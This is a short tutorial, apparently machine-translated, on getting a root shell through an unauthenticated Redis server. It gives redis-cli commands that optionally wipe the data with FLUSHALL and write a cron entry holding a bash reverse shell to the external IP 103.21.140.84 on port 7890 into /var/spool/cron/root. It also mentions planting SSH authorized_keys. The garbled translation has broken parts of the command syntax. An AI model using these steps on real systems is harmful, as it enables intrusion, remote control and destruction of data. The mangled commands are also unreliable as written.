Example of Redis to get shell

Background

Redis The default installation is complete only on-machine access and no password.

The general company's application will require multiple servers to access Redis, so the operation dimension will be/etc/redis.conf in the Bind-ip to 0.0.0.0, resulting in the extranet can be anonymous access (no password required).

The problem that the extranet can visit causes is Redis data leakage, this time still cannot cause direct use.

But if the Redis is started with the root account, it will cause the get SHELL.

Use the way

Through the Redis Config command, you can write to any file, permissions enough to write timed task bounce to get the shell

# even a redis.
Redis-cli-h Your_redis_server

# Keep Write clean, erase original data (if it's someone else's machine, don't recommend it)
# Flushall

# Set Key (0) for bash Bounce shell script, execute every minute, listen on 7890 ports on its own server (NC-VVL 7890)
Set 0 "\N\N*/1 * * * */bin/bash-i >&/dev/tcp/103.21.140.84/7890 0>&1\n\n"

# Set Where to save
Config set dir/var/spool/cron/

# Set the saved file name
Config set dbfilename root

# Save
Save

A variety of use posture

In addition to the direct write time task to get the shell, there can be a variety of postures.

Write cron Bounce a shell
Write ~/.ssh/authorized_keys, log in using the key directly